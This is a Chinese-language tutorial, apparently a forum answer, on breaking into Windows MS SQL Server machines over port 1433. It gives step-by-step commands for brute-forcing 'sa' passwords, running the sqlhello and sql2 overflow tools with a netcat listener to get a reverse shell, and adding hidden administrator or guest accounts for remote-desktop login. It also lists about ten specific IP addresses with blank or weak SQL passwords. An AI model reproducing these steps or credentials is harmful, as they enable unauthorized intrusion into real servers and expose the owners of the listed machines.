SQLScanPass.exe 進行字典暴破(字典是關鍵)
最後 SQLTools.exe入侵
對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機端口 sqlhelloF.exe 入侵ip 1433 本機ip 本機端口
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)
久違的溢出工具
用X-Scan對該站點的Server掃描結果出來了,開的端口還不少呢:53、80、1433、3389。可並沒有報告說發現有弱口令,看來網管還算比較有責任心。但開了3389端口,意味著可以遠程登錄,這可是微軟給所有Windows用戶獻上的最大的“木馬”。
通過觀察,我發現只有在1433端口上下點工夫,想想辦法。何不用SQL2溢出工具試試?
先開壹個cmd窗口,祭出寶刀netcat,在命令提示符下敲入“netcat -l -p 99”,監聽本地99端口。接著該SQL2出馬了。再打開壹個cmd窗口,鍵入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是對方IP,61.157.*.*是我自己的IP,回車後提示package sent successful。再回過頭去看看監聽本地端口的netcat,已經變成了C:\WinNT\system32\_,這就是對方機器的系統文件夾了,看來是成功溢出了,就這麽簡單。
我很幸運地得到了對方的壹個Shell,而且還是administrator權限的。接下來的操作就輕車熟路了,添加用戶,提升權限:在提示符下鍵入“net user hacker 12345 /add”(在對方機器裏創建壹個名為hacker,密碼為12345的用戶),再鍵入“net localgroup administrators hacker /add”(把用戶hacker加入到管理員組),接下來就該是3389遠程登錄了。
首先運行Windows XP自帶遠程登錄器mstsc.exe,填入對方的IP地址218.147.*.*,確定後在登錄界面填上我剛創建的用戶名hacker和密碼12345,順利地進入了對方的Windows 2000桌面。
218.5.135.66 SQL-Server弱口令: "sa/1234"
218.14.115.111 SQL-Server弱口令: "sa/[空口令]"
218.12.38.52 SQL-Server弱口令: "sa/[空口令]"
218.12.97.14 SQL-Server弱口令: "sa/[空口令]"
218.6.242.228 SQL-Server弱口令: "sa/[空口令]"
222.100.119.3 SQL-Server弱口令: "sa/[空口令]"
222.105.67.200 SQL-Server弱口令: "sa/[空口令]"
222.105.28.130 SQL-Server弱口令: "sa/[空口令]"
222.106.60.51 SQL-Server弱口令: "sa/[空口令]"
222.117.107.1 SQL-Server弱口令: "sa/[空口令]"
在win2000機器上裝了mssql的話,機器就會開1433端口。什麽 什麽是端口?就象食堂買菜的窗口壹樣,妳買白菜上1號窗,買西紅柿上2號窗。在機器上買mssql就上1433端口。溢出1433需要兩個工具nc.exe和sql2.exe。進攻方法就兩步,在自己機器上開壹個cmd窗口。對了,妳要用win2000的話就在開始-運行-鍵入cmd回車就成了餓。這裏我們只用2000不說98。如果妳把妳的下的nc.exe和sql2.exe放在C:盤的話,就在妳開的這個窗口打入命令c:>nc -1 -p 40回車。這步的意思是用nc這個工具開壹個40的端口監聽。第二步:再在開始-運行-鍵入cmd灰塵,再開個窗口。在這個窗口寫入命令c:>sql2.exe妳要入侵網站的ip和妳自己的ip 40 0回車。這裏要作點說明:如何得到入侵網站的ip?在cmd下c:>ping 網址,就行了。自己的ip就不用我說了吧?算了還是說下吧,在cmd下鍵入ipconfig就可以了。其中命令行中的40妳可以隨便改成別的,但好象40和53的成功率高壹點。再是命令中的0不性的話,妳就試試1或2。如果入侵網站有這個漏洞的話,那麽妳開的第壹個窗口就會邊成肉雞的c:>winnt\system32>.就是說,妳已經進入它的機器裏了。進去以後,妳可以添加個擁護了。net user guest /active:yes用這個命令,就將默認禁止的guest擁護激火。net user guest 123456這樣guest的密碼變成了123456了。net localgroup administrators guest /add這就是guest成為最高權限的管理員了。
呵呵,基本就是這樣了,,,,
參考資料:
希望我回答對妳有所幫助